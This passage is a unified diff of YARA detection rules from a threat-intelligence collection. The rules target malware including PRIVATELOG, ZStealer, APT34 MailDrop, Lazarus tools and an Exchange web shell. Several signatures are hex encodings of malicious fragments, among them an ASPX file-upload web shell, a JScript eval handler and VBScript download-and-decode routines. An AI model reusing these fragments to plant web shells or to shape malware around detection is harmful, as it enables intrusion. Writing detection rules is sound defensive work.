+		$l1 = { 20 68 74 74 70 3a 2f 2f ?? 2f 3c 73 63 72 69 70 74 20 4c 61 6e 67 75 61 67 65 3d 22 63 23 22 20 72 75 6e 61 74 3d 22 73 65 72 76 65 72 22 3e 76 6f 69 64 20 50 61 67 65 5f 4c 6f 61 64 28 6f 62 6a 65 63 74 20 73 65 6e 64 65 72 2c 20 45 76 65 6e 74 41 72 67 73 20 65 29 7b 69 66 20 28 52 65 71 75 65 73 74 2e 46 69 6c 65 73 2e 43 6f 75 6e 74 21 3d 30 29 20 7b 20 52 65 71 75 65 73 74 2e 46 69 6c 65 73 5b 30 5d 2e 53 61 76 65 41 73 28 53 65 72 76 65 72 2e 4d 61 70 50 61 74 68 28 22 [5-14] 22 29 29 3b 7d 7d 3c 2f 73 63 72 69 70 74 3e }
+		$l2 = { 68 74 74 70 3a 2f 2f ?? 2f 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 53 63 72 69 70 74 22 20 72 75 6e 61 74 3d 22 73 65 72 76 65 72 22 3e 66 75 6e 63 74 69 6f 6e 20 50 61 67 65 5f 4c 6f 61 64 28 29 7b 65 76 61 6c 28 [-] 2c 22 75 6e 73 61 66 65 22 29 3b 7d 3c 2f 73 63 72 69 70 74 3e }
+		$c1 = { 5c 4f 41 42 20 28 44 65 66 61 75 6c 74 20 57 65 62 20 53 69 74 65 29 }
+		$c2 = "ExternalUrl" fullword ascii
+		$c3 = { 49 49 53 3a 2f 2f [10-30] 2f 57 33 53 56 43 2f [1-3] 2f 52 4f 4f 54 2f 4f 41 42 }
+		$c4 = "FrontEnd\\HttpProxy\\OAB" fullword ascii
+		$c5 = "/Configuration/Schema/ms-Exch-OAB-Virtual-Directory" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 500KB and 4 of ( $debug* ) and 3 of ( $reg* )
+		filesize > 1KB and 1 of ( $l* ) and 3 of ( $c* )
 }
-rule ARKBIRD_SOLG_MAL_PRIVATELOG_Sep_2021_1 : FILE
+rule ARKBIRD_SOLG_APK_Droidwatcher_Nov_2021_1 : FILE
 {
 	meta:
-		description = "Detect PRIVATELOG malware"
+		description = "Detect modified DroidWatcher stealer used by Void Balaur group"
 		author = "Arkbird_SOLG"
-		id = "fa122d77-0bac-5836-85fd-b096660f7412"
-		date = "2021-09-01"
-		modified = "2021-09-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-09-05/MAL_PRIVATELOG_Sep_2021_1.yara#L1-L22"
+		id = "04e02521-d89a-5f72-8b6f-0350f6defdd0"
+		date = "2021-11-11"
+		modified = "2021-11-12"
+		reference = "https://documents.trendmicro.com/assets/white_papers/wp-void-balaur-tracking-a-cybermercenarys-activities.pdf"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-11/Void_Balaur/APK_DroidWatcher_Nov_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "4df78bc3005c67d467a0999751bf4fb42ff9075f1601d51ab3b2b88e5dc38f6e"
+		logic_hash = "c16bcdd5d9cd6a3cbb527893e13ac967211d1686edd9f7ae03e37feada725a1b"
 		score = 50
-		quality = 50
+		quality = 75
 		tags = "FILE"
-		hash1 = "1e53559e6be1f941df1a1508bba5bb9763aedba23f946294ce5d92646877b40c"
-		hash2 = "b9d4ec771a79f53a330b29ed17f719dac81a4bfe11caf0eac0efacd19d14d090"
-		level = "experimental"
-		tlp = "White"
-		adversary = "-"
+		hash1 = "902c5f46ac101b6f30032d4c5c86ecec115add3605fb0d66057130b6e11c57e6"
+		tlp = "white"
+		level = "Experimental"
+		adversary = "Void Balaur"
 
 	strings:
-		$s1 = { 41 89 d0 48 83 ec 20 4c 89 f1 31 d2 e8 cb 8c 00 00 48 83 ec 10 48 89 5c 24 20 48 8d 15 4b 03 02 00 48 c7 c1 02 00 00 80 45 31 c0 41 b9 19 01 02 00 ff 15 55 52 01 00 48 83 c4 30 89 c7 85 c0 75 5a 49 8d 46 02 48 8b 0b 48 83 ec 30 48 89 74 24 28 48 89 44 24 20 48 8d 15 4f 03 02 00 45 31 c0 45 31 c9 ff 15 1b 52 01 00 48 83 c4 30 89 c7 85 c0 75 28 66 41 c7 06 7b 00 48 83 ec 20 48 8d 15 c0 02 02 00 4c 89 f1 ff 15 17 52 01 00 4c 89 f1 e8 67 c9 00 00 48 83 c4 20 31 ff 48 8b 0b 48 83 ec 20 ff 15 d4 51 01 00 48 83 c4 20 48 8b 4d f8 48 31 e9 48 83 ec 20 e8 f0 79 00 00 48 83 c4 20 89 f8 48 89 ec }
-		$s2 = { 48 8d 0d 87 c9 01 00 48 8d 15 47 01 00 00 ff 15 1a 14 01 00 48 89 05 e3 d8 01 00 48 85 c0 0f 84 d0 00 00 00 c7 05 e8 d8 01 00 00 00 00 00 48 8d 15 d1 d8 01 00 c7 05 df d8 01 00 b8 0b 00 00 0f 28 05 80 1c 01 00 0f 29 05 b9 d8 01 00 44 8b 05 e2 c8 01 00 41 8d 48 01 89 0d d8 c8 01 00 44 89 05 b5 d8 01 00 48 89 c1 ff 15 b8 13 01 00 31 c9 ba 01 00 00 00 45 31 c0 45 31 c9 ff 15 b5 14 01 00 48 89 05 9e d8 01 00 48 85 c0 0f 84 85 00 00 00 48 b8 04 00 00 00 01 00 00 00 48 89 05 68 d8 01 00 48 8d 15 5d d8 01 00 c7 05 5f d8 01 00 00 00 00 00 48 c7 05 5c d8 01 00 00 00 00 00 48 8b 0d 39 d8 01 00 ff 15 5b 13 01 00 e8 61 01 00 00 85 c0 74 2b 48 b9 01 00 00 00 01 00 00 00 48 89 0d 25 d8 01 00 48 8d 15 1a d8 01 00 89 05 20 d8 01 00 eb 44 48 83 c4 28 48 ff 25 57 14 01 00 48 8b 0d 20 d8 01 00 ba ff ff ff ff ff 15 9d 13 01 00 e8 eb c5 ff ff 48 b8 01 00 00 00 01 00 00 00 48 89 05 e3 d7 01 00 48 8d 15 d8 d7 01 00 c7 05 da d7 01 00 00 00 00 00 48 c7 05 d7 d7 01 00 00 00 00 00 48 8b 0d b4 d7 01 00 48 83 c4 28 48 ff 25 d1 12 01 00 48 83 ec 28 83 f9 01 75 69 48 b8 03 00 00 00 01 00 00 00 48 89 05 9b d7 01 00 48 8d 15 90 d7 01 00 31 c0 89 05 94 d7 01 00 89 05 9a d7 01 00 8b 05 ac c7 01 00 8d 48 01 89 0d a3 c7 01 00 89 05 81 d7 01 00 48 8b 0d 5e d7 01 00 ff 15 80 12 01 }
-		$s3 = { 48 89 01 c7 44 24 28 00 00 00 00 c7 44 24 20 03 00 00 00 ba 00 00 00 80 41 b8 01 00 00 00 45 31 c9 ff 15 f7 59 01 00 48 83 f8 ff 0f 84 e0 01 00 00 48 89 c6 0f 57 c0 48 8d 94 24 a0 00 00 00 0f 29 42 60 0f 29 42 50 0f 29 42 40 0f 29 42 30 0f 29 42 20 0f 29 42 10 0f 29 02 48 c7 42 70 00 00 00 00 4c 8d 44 24 7c 41 c7 00 78 00 00 00 48 89 c1 ff 15 9f 59 01 00 85 c0 0f 84 d0 01 00 00 8b 84 24 dc 00 00 00 c1 e0 0d 48 8d 8c 24 98 00 00 00 48 89 4c 24 38 89 44 24 20 c7 44 24 30 01 00 00 00 c7 44 24 28 02 00 00 00 48 89 f1 31 d2 45 31 c0 45 31 c9 ff 15 53 59 01 00 85 }
-		$s4 = { c6 00 00 48 ff c0 48 83 ec 20 48 89 f9 48 89 c2 ff 15 8e 19 01 00 48 8d 15 a9 cd 01 00 48 89 d9 ff 15 86 19 01 00 48 89 d9 ff 15 55 19 01 00 48 }
-		$s5 = "Global\\APCI#" fullword wide
-		$s6 = "uGlobal\\HVID_" fullword ascii
+		$s1 = { 38 50 F4 59 CC FF F3 37 65 28 4F 35 1A D2 83 C9 6C E0 20 27 38 C5 39 2E 72 95 5B 3C E0 29 D1 9E C7 0C A4 21 1B 55 09 A5 0B 83 99 C8 7C D6 F2 0F 47 B9 CE 43 82 5E C4 0C }
+		$s2 = { 3C E2 39 81 D4 EA 82 1F F8 83 42 54 A0 2E 6D E8 C5 44 E6 B0 92 13 5C E6 21 EF 89 9D 26 28 90 8C 3C 94 A3 36 AD E9 CD 48 26 B2 92 1D 1C E4 34 57 B9 C7 2B A2 7D 1E 14 A8 4A 4D 5A D3 8E 2E F4 A4 1F 83 19 C1 58 A6 32 9B 05 2C 63 03 DB B9 42 }
+		$s3 = { F0 96 6F 33 59 1B BA 32 82 8D 5C 22 28 B3 1E 4C 65 BA 31 99 4D 1C E0 2E 89 7E F3 1E 94 A7 13 13 08 E7 22 31 7E D7 EB 28 42 53 46 B0 81 73 7C 22 E3 1F 62 4E 17 66 B2 8F 47 A4 CA A2 D6 68 C9 44 36 72 9D 78 7F 7A 16 B5 18 CA 5A 4E F2 92 74 59 }
+		$s4 = { 3D 57 89 56 4D 9E 51 9C CE 2C 20 92 B8 D5 C5 81 7A 8C 65 03 17 F9 C0 77 35 5C 4F 0B 26 B0 99 0B C4 A9 69 5D A9 44 0F 66 F2 2F F7 48 5C 4B 7E 50 9D 41 2C E0 34 AF 89 5F 5B 9E 50 92 C6 F4 65 3C 0B D8 CA 1E CE F3 80 CF EA B8 9E 94 A4 E5 37 72 51 88 0A 34 A3 2F 03 19 CE 41 22 B8 C9 5D 1E F2 82 77 44 AF AB }
+		$s5 = { FA D6 A4 0F EB 79 42 D2 76 F6 54 BA B2 9A 27 FC D0 5E 9E 30 8D 2B 24 E9 A0 AE A8 41 33 06 32 84 51 8C 63 12 33 98 CF 72 36 B0 8B 83 1C E3 12 D7 B8 CD 63 5E 13 B3 A3 FE 45 06 8A D0 80 3E 0C 66 32 33 59 C6 66 0E 10 C1 39 AE F3 84 D7 C4 EF E4 EC C8 37 64 22 17 F9 28 42 45 3A 31 9E A5 EC E1 14 37 79 C0 DB FF FD B6 B3 E7 F3 3B 45 A9 45 28 E3 D9 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 20KB and 4 of ( $s* )
+		uint32be( 0 ) == 0x504B0304 and filesize > 300KB and 4 of them
 }
-rule ARKBIRD_SOLG_MAL_Stashlog_Sep_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Zstealer_Nov_2021_1 : FILE
 {
 	meta:
-		description = "Detect Stashlog malware"
+		description = "Detect ZStealer stealer used by Void Balaur group"
 		author = "Arkbird_SOLG"
-		id = "a6ae59df-c45a-5a31-8530-4fd7f0f33f93"
-		date = "2021-09-01"
-		modified = "2021-09-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-09-05/MAL_Stashlog_Sep_2021_1.yara#L1-L21"
+		id = "0282884b-569a-5e46-a6ad-d2776ff71ddb"
+		date = "2021-11-11"
+		modified = "2021-11-12"
+		reference = "https://documents.trendmicro.com/assets/white_papers/wp-void-balaur-tracking-a-cybermercenarys-activities.pdf"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-11/Void_Balaur/MAL_ZStealer_Nov_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "6bde398a0f13674e72fcbd9809d22773bc1fe699f7c187775740d50910b07d5b"
-		score = 50
+		logic_hash = "c3bec4fb8338ad71577e63f81c22b5d250083f2475f60610de8dccd4979035d3"
+		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "720610b9067c8afe857819a098a44cab24e9da5cf6a086351d01b73714afd397"
-		hash2 = "869165044402a5f82f4cb8ddd51663ebb05f86345f346f765dcc54b20706cf7c"
-		level = "experimental"
-		tlp = "White"
-		adversary = "-"
+		hash1 = "af89d85a3b579ac754850bd6e52e7516c2e63141107001463486cd01bc175052"
+		hash2 = "5a2c9060f6cc1e6e0fd09b2b194631d2c7e7f024d9e2d3a9be64570e263f565f"
+		tlp = "white"
+		adversary = "Void Balaur"
 
 	strings:
-		$s1 = "497E724A7BA2764BB4570B225601FB693A796873E7847DB943F7FE9E7281C91A443DF1F8519CBB25FC736CC65BF3DE67A82E704BEB698E17" fullword ascii
-		$s2 = { 50 83 ec 0c 89 e0 31 c9 89 48 04 89 08 89 48 0c 89 48 08 50 ff 15 1c b2 42 00 c7 05 38 ac 44 00 01 00 00 00 50 83 ec 0c 89 e7 81 ec 04 01 00 00 31 c0 89 e3 89 47 04 89 07 89 47 0c 89 47 08 57 ff 15 1c b2 42 00 ff 25 64 5f 43 00 ff 25 6c 5f 43 00 0f b6 4f 0e 0f b6 47 0f 0f b6 57 0d 89 4d dc 0f b6 4f 0c 89 45 d8 89 55 e0 89 4d e4 ff 25 7c 5f 43 00 8b 4d f0 31 f6 46 31 e9 e8 94 48 01 00 89 f0 8d 65 f4 5e 5f 5b 5d c3 a0 00 30 43 00 8a 15 01 30 43 00 8a 0d 02 30 43 00 f6 d0 80 f2 c1 80 f1 ec a2 40 30 43 00 88 15 41 30 43 00 8a 15 03 30 43 00 88 0d 42 30 43 00 8a 0d 04 30 43 00 80 f2 f4 80 f1 c4 88 15 43 30 43 00 8a 15 05 30 43 00 88 0d 44 30 43 00 8a 0d 06 30 43 00 80 f2 40 80 f1 24 88 15 45 30 43 00 88 0d 46 30 43 00 a0 00 30 43 00 8a 15 01 30 43 00 8a 0d 02 30 43 00 f6 d0 80 f2 c1 80 f1 ec a2 40 30 43 00 88 15 41 30 43 00 8a 15 03 30 43 00 88 0d 42 30 43 00 8a 0d 04 30 43 00 80 f2 f4 80 f1 c4 88 15 43 30 43 00 8a 15 05 30 43 00 88 0d 44 30 43 00 8a 0d 06 30 43 00 80 f2 40 80 f1 24 88 15 45 30 43 00 88 0d 46 30 43 00 ff 25 34 5f 43 00 0f 10 05 08 30 43 00 0f 10 0d 18 30 43 00 a0 28 30 43 00 8a 15 29 30 43 00 8a 0d 2a 30 43 00 0f 57 05 80 b2 42 00 0f 57 0d 90 b2 42 00 34 e9 80 f2 10 80 f1 b3 0f 11 }
-		$s3 = { 50 6a 03 50 6a 01 68 00 00 00 80 53 ff 15 00 b2 42 00 31 c0 66 c7 84 24 ae 00 00 00 3a 00 50 6a 03 50 6a 01 68 00 00 00 80 53 ff 15 00 b2 42 00 ff 25 e8 a9 43 00 89 c7 31 c0 83 ff ff 0f 94 c0 ff 24 85 ec a9 43 00 c7 44 24 1c 00 00 00 00 ff 25 28 aa 43 00 0f 57 c0 31 c0 89 84 24 a4 00 00 00 89 84 24 a0 00 00 00 0f 29 84 24 90 00 00 00 0f 29 84 24 80 00 00 00 0f 29 44 24 70 0f 29 44 24 60 0f 29 44 24 50 0f 29 44 24 40 0f 29 44 24 30 ff 25 30 aa 43 00 0f 57 c0 31 c0 89 84 24 a4 00 00 00 89 84 24 a0 00 00 00 0f 29 84 24 90 00 00 00 0f 29 84 24 80 00 00 00 0f 29 44 24 70 0f }
-		$s4 = { a1 d8 b1 42 00 89 3b f2 0f 10 00 f2 0f 11 01 a1 d8 b1 42 00 89 3b f2 0f 10 00 f2 0f 11 01 ff 25 68 1f 44 00 89 cb ff 25 70 1f 44 00 31 c9 85 c0 8b 06 8b 5e 0c 0f }
-		$s5 = { 31 c0 ff 75 0c ff 75 08 50 50 68 b0 74 43 00 53 ff 15 10 b0 42 00 31 c0 ff 75 0c ff 75 08 50 50 68 b0 74 43 00 53 ff 15 10 b0 42 00 89 c6 ff 25 70 b7 43 00 ff 37 ff 15 0c b0 42 00 8b 4d f0 31 e9 e8 a9 f6 00 00 89 f0 8d 65 f4 5e 5f 5b 5d c3 57 68 19 01 02 00 6a 00 68 70 74 43 00 68 02 00 00 80 ff 15 14 b0 42 00 57 68 19 01 02 00 6a 00 68 70 74 43 00 68 02 00 00 80 ff 15 14 b0 42 00 ff 25 48 b7 43 00 55 }
+		$s1 = { 53 33 c0 55 68 71 d3 46 00 64 ff 30 64 89 20 a1 80 7f 7b 00 8b 10 ff 52 44 a1 84 7f 7b 00 8b 10 ff 52 44 8d 45 fc 50 68 80 d3 46 00 68 02 00 00 80 e8 e3 a3 f9 ff 85 c0 0f 85 94 01 00 00 8d 45 f8 ba 00 10 00 00 e8 86 83 f9 ff c7 45 f0 00 10 00 00 33 db e9 49 01 00 00 8d 45 f4 50 6a 00 8d 45 f8 e8 36 82 f9 ff 8d 55 e8 e8 e6 cd f9 ff 8b 4d e8 8d 45 ec ba bc d3 46 00 e8 12 80 f9 ff 8b 55 ec b9 fc d3 46 00 b8 02 00 00 80 e8 d4 d8 ff ff 84 c0 0f 84 01 01 00 00 8d 55 e4 8b 45 f4 e8 c5 c0 f9 ff 8b 55 e4 8d 45 f4 e8 6e 7d f9 ff 8b 55 f4 b8 14 d4 46 00 e8 cd 82 f9 ff 85 c0 7e 32 8d 45 e0 50 8b 55 f4 b8 14 d4 46 00 e8 b8 82 f9 ff 8b c8 83 c1 03 ba 01 00 00 00 8b 45 f4 e8 c2 81 f9 ff 8b 55 e0 a1 80 7f 7b 00 8b 08 ff 51 38 eb 0d 8b 55 f4 a1 80 7f 7b 00 8b 08 ff 51 38 8d 45 f4 50 6a 00 8d 45 f8 e8 90 81 f9 ff 8d 55 d8 e8 40 cd f9 ff 8b 4d d8 8d 45 dc ba bc d3 46 00 e8 6c 7f f9 ff 8b 55 dc b9 24 d4 46 00 b8 02 00 00 80 e8 2e d8 ff ff 84 c0 74 42 8d 45 f8 }
+		$s2 = { 8b d9 88 55 fb 89 45 fc 33 c0 55 68 b3 2e 46 00 64 ff 30 64 89 20 33 d2 8b 45 fc e8 a0 11 fa ff b2 01 a1 2c 74 41 00 e8 94 11 fa ff 8b 55 fc 89 42 0c 8b 45 fc c6 40 08 00 33 c0 89 45 f4 33 d2 55 68 96 2e 46 00 64 ff 32 64 89 22 8d 45 f0 89 5d ec 8b 55 ec e8 9e 21 fa ff 8b 45 fc 83 c0 04 50 8b 45 f0 e8 b7 25 fa ff 50 e8 2d f5 ff ff 83 c4 08 85 c0 74 66 8b 45 fc 8b 40 04 85 c0 74 39 50 e8 26 f5 ff ff 59 89 45 f4 89 5d dc c6 45 e0 0b 8b 45 f4 89 45 e4 c6 45 e8 06 8d 45 dc 50 6a 01 b9 e4 2e 46 00 b2 01 a1 58 2c 46 00 e8 be a1 fa ff e8 9d 19 fa ff eb 23 89 5d d4 c6 45 d8 0b 8d 45 d4 50 6a 00 b9 10 2f 46 00 b2 01 a1 58 2c 46 00 e8 99 a1 fa ff e8 78 19 fa ff 33 c0 5a 59 59 64 89 10 68 9d 2e 46 00 83 7d f4 00 74 0a 8b 45 f4 50 e8 c4 f4 ff ff }
+		$s3 = { 68 1d c7 45 00 64 ff 30 64 89 20 8b c3 e8 d8 89 fa ff 8d 45 fc ba 00 01 00 00 e8 17 90 fa ff c7 45 f8 ff 00 00 00 8d 45 f8 50 8d 45 fc e8 d0 8e fa ff 50 e8 f6 af fa ff c7 45 f4 ff 00 00 00 c7 45 f0 ff 00 00 00 8d 45 ec 50 8d 45 f0 50 8d 85 ec fd ff ff 50 8d 45 f4 50 8d 85 ec fe ff ff 50 8d 45 fc e8 9a 8e fa ff 50 6a 00 e8 d6 af fa ff 85 c0 0f 84 6d 01 00 00 8d 85 ec fe ff ff 50 e8 ba af fa ff 85 c0 0f 84 59 01 00 00 8d 85 ec fe ff ff 50 e8 7e af fa ff 8b f0 8d 85 ec fe ff ff 50 e8 80 af fa ff 0f b6 38 8b c3 ba 34 c7 45 00 e8 89 89 fa ff 80 3e 00 75 }
+		$s4 = { a1 9c c2 49 00 8b 00 e8 e3 82 01 00 8b 93 88 01 00 00 8b 08 ff 51 54 8b f8 85 ff 7c 15 a1 9c c2 49 00 8b 00 e8 c6 82 01 00 8b d7 8b 08 ff 51 18 8b f0 6a 01 56 e8 e1 f2 fc ff 8b c3 e8 be 17 00 00 8a 93 84 01 00 00 e8 2f 61 00 00 33 c0 5a 59 59 }
+		$s5 = { 45 72 72 6f 72 20 5b 25 64 5d 3a 20 25 73 2e 0d 22 25 73 22 3a 20 25 73 00 00 ff ff ff ff 0a 00 00 00 4e 6f 20 6d 65 73 73 61 67 65 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 20KB and 4 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 300KB and all of them
 }
-
-rule ARKBIRD_SOLG_APT_Lazarus_Stealer_Packed_July_2020_1 : FILE
+rule ARKBIRD_SOLG_APT_APT_34_Maildrop_Mar_2021_1 : FILE
 {
 	meta:
-		description = "Detected Lazarus Strealer Packed by Thermida - July 2020"
+		description = "Detect MailDrop malware used by APT34"
 		author = "Arkbird_SOLG"
-		id = "325039a4-34c7-5144-93c0-61b013e30606"
-		date = "2020-07-23"
-		modified = "2023-11-22"
-		reference = "https://twitter.com/DeadlyLynn/status/1286233135751995397"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-07-23/Yara_Rule_APT_Lazarus_Stealer_July_2020_1.yar#L36-L66"
+		id = "a17c4e0b-9bbb-594d-8551-5c146e6a601e"
+		date = "2021-04-03"
+		modified = "2021-04-09"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-04-03/APT34/APT_APT_34_MailDrop_Mar_2021_1.yar#L1-L24"
 		license_url = "N/A"
-		logic_hash = "f062c8f784133ad586490036757ff9d5e8a799e8abac94eeacf60743783e19ed"
+		logic_hash = "f55192044bf8e190dfdc18aeaac543a5022643ea242e75ff2492939ae6e1814c"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-		hash1 = "431e6784ef33f2b3963464458e73915875947b11348533544cc16c53af64740f"
-		hash2 = "70f45a7bbddda140695b953254650486733d8039c63e4eaeb454c1189a97989b"
+		hash1 = "d6b876d72dba94fc0bacbe1cb45aba493e4b71572a7713a1a0ae844609a72504"
+		hash2 = "ebae23be2e24139245cc32ceda4b05c77ba393442482109cc69a6cecc6ad1393"
 
 	strings:
-		$s1 = "fill_win32_filefunc64" fullword ascii
-		$s2 = "gzfread" fullword ascii
-		$s3 = "deflateGetDictionary" fullword ascii
-		$s4 = "gzfwrite" fullword ascii
-		$s5 = "adler32_z" fullword ascii
-		$s6 = "@AJ<LxwBMDNCIFE}#SRV" fullword ascii
-		$s7 = "uncompress2" fullword ascii
-		$s8 = "zxyakauj" fullword ascii
-		$s9 = "gzfwrite" fullword ascii
-		$s10 = "tphfpzvy" fullword ascii
-		$s11 = "Dn.dll" fullword ascii
-		$s12 = ":USER32.8dl" fullword ascii
-		$s13 = "zlib data compression and ZIP file I/O library" fullword wide
-		$s14 = "Dn64.dll" fullword ascii
-		$s15 = "zlibwapi.dll" fullword ascii
-		$s16 = "CTRL+_" fullword ascii
-		$s17 = "ZLib.DLL" fullword ascii
-		$s18 = "(C) 1995-2017 Jean-loup Gailly & Mark Adler-" fullword ascii
-		$s19 = "zlib data compression and ZIP file I/O library" fullword ascii
-		$s20 = "DLL support by Alessandro Iacopetti & Gilles Vollant" fullword ascii
+		$EWSInitCom = { 7e ?? 00 00 04 28 ?? 00 00 06 ?? 4f [0-3] 02 7b ?? 00 00 04 28 ?? 00 00 06 28 ?? 00 00 06 02 7b ?? 00 00 04 6f ?? 00 00 06 02 7b ?? 00 00 04 28 ?? 00 00 06 72 ?? 00 00 70 28 ?? 00 00 0a 28 ?? 00 00 06 02 7b ?? 00 00 04 6f ?? 00 00 06 7e ?? 00 00 04 72 ?? 00 00 70 28 ?? 00 00 06 7e 06 00 00 04 28 ?? 00 00 06 [2-4] 00 00 [3-4] 00 00 [3] 00 00 [3] 00 00 [3] 00 00 }
+		$EWSCom = { 13 30 ?? 00 ?? 00 00 00 00 00 00 00 02 28 ?? 00 00 ?? 02 03 05 0e 04 0e 05 0e 06 [0-4] 73 ?? 00 00 06 7d ?? 00 00 04 04 [2-6] 00 00 ?? 02 ?? 7d ?? 00 00 04 [0-2] 02 ?? 7d ?? 00 00 04 [2-4] 00 00 [0-18] 04 02 28 ?? 00 00 06 2a }
+		$EWSDecrypt = { 13 30 03 00 27 00 00 00 ?? 00 00 11 0f 00 20 00 01 00 00 16 28 ?? 00 00 06 28 ?? 00 00 06 0a 0f 00 1f 10 16 28 ?? 00 00 06 0b 02 06 07 28 ?? 00 00 06 2a }
+		$EWSRandomData = { 1b 30 ?? 00 ?? 00 00 00 ?? 00 00 11 02 19 28 ?? 00 00 0a 0a 16 0b ?? 35 [0-3] 06 16 6a 16 6f ?? 00 00 0a 26 06 6f ?? 00 00 0a d4 8d ?? 00 00 01 0c 7e ?? 00 00 04 08 6f ?? 00 00 0a 06 08 16 06 6f ?? 00 00 0a b7 6f ?? 00 00 0a 07 17 d6 0b 07 1f 32 32 c6 [5-11] 06 6f ?? 00 00 0a dc 2a [0-1] 01 10 00 00 02 00 08 00 }
+		$s1 = "HMicrosoft Office/15.0 (Windows NT {0}; Microsoft Outlook 15.0.4675; Pro)" fullword ascii
+		$s2 = "https://{0}/ews/exchange.asmx" fullword wide
+		$s3 = "Send_Log" fullword ascii
+		$s4 = "CheckEWSConnection" fullword ascii
+		$s5 = "Done:D" fullword wide
+		$s6 = "ExecAllCmds" fullword ascii
+		$s7 = "ExchangeUri" fullword ascii
+		$s8 = "get_cmdSubject" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 550KB and pe.imphash ( ) == "baa93d47220682c04d92f7797d9224ce" and pe.exports ( "BZ2_bzInit" ) and pe.exports ( "BZ2_bzZip" ) and pe.exports ( "BZ2_bzZipW" ) and pe.exports ( "adler32_z" ) and pe.exports ( "crc32_z" ) and pe.exports ( "deflateGetDictionary" ) and 15 of them
+		uint16( 0 ) == 0x5a4d and filesize > 20KB and 2 of ( $EWS* ) and 5 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Keylogger_Jul_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_Lazarus_EPS_July_2020_1 : FILE
 {
 	meta:
-		description = "Detect a keylogger used by IAmTheKing group"
+		description = " Detected Lazarus EPS script for download and execute the payload in base 64"
 		author = "Arkbird_SOLG"
-		id = "186dc5f5-5cc2-551a-a34c-e775085e7f89"
-		date = "2021-07-09"
-		modified = "2021-07-12"
-		reference = "https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_Keylogger_Jul_2021_1.yara#L1-L22"
+		id = "244ef018-bc7b-5e10-bf65-b52fdb5ad403"
+		date = "2020-07-28"
+		modified = "2020-07-28"
+		reference = "https://twitter.com/spider_girl22/status/1287952503280082944"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-07-28/Lazarus/APT_Lazarus_EPS_July_2020_1.yar#L3-L30"
 		license_url = "N/A"
-		logic_hash = "dfdf5892564b93cd1bf564cfe62e37d9477b5ae0bf20e0f9a44ee97b7e3a99f8"
+		logic_hash = "0fbd6ac10a31cc9a571e42f8696480336cd350e56ba2ffafb386f066fd53c552"
 		score = 75
-		quality = 71
+		quality = 45
 		tags = "FILE"
-		hash1 = "4c6995cb65ffeac1272d296eb3273b9fbca7f4d603312a5085b5c3be96154915"
-		hash2 = "79d363a163dfb0088545e66404e0213a9e18d5ee66713d7bc906ed97c46b5ca3"
-		tlp = "White"
-		adversary = "IAmTheKing"
-
-	strings:
-		$s1 = "sonme hting is wrong x" fullword ascii
-		$s2 = { 25 73 25 73 25 73 25 73 }
-		$s3 = { 0d 0a 5b 44 41 54 41 5d 3a 0d 0a 00 4c 6f 67 2e 74 78 74 }
-		$s4 = { 0d 0a 5b 54 49 4d 45 3a 5d 25 64 2f 25 64 2f 25 64 20 25 30 32 64 3a 25 30 32 64 3a 25 30 32 64 0d 0a 5b 54 49 54 4c 45 3a 5d }
-		$s5 = { 25 73 2d 25 30 32 64 2d 25 30 32 64 2d 25 30 32 64 2d 25 30 32 64 }
-		$s6 = { 6a 00 56 ff 75 f8 8d 45 e4 50 ff 75 f0 ff 75 f4 ff 75 08 ff 15 c4 80 40 00 8b f0 3b f7 74 12 56 ff 15 70 80 40 00 85 c0 75 1b 56 ff 15 78 }
+		hash1 = "152c620980f0fc20a6eade0f5b726b98fc28392d84ce386a5fc1b0877ef446d7"
+
+	strings:
+		$s1 = { 63 64 20 2F 64 20 22 25 61 70 70 64 61 74 61 25 5C 4D 69 63 72 6F 73 6F 66 74 5C 49 6E 74 65 72 6E 65 74 20 45 78 70 6C 6F 72 65 72 22 }
+		$s2 = { 46 75 6E 63 74 69 6F 6E 20 42 61 73 65 36 34 44 65 63 6F 64 65 28 42 79 56 61 6C 20 76 43 6F 64 65 29 }
+		$s3 = { 43 72 65 61 74 65 4F 62 6A 65 63 74 28 22 4D 73 78 6D 6C 32 2E 44 4F 4D 44 6F 63 75 6D 65 6E 74 2E 33 2E 30 22 29 }
+		$s4 = { 46 75 6E 63 74 69 6F 6E 20 42 69 6E 61 72 79 54 6F 53 74 72 69 6E 67 28 42 69 6E 61 72 79 29 }
+		$s5 = { 43 72 65 61 74 65 4F 62 6A 65 63 74 28 22 41 44 4F 44 42 2E 53 74 72 65 61 6D 22 29 }
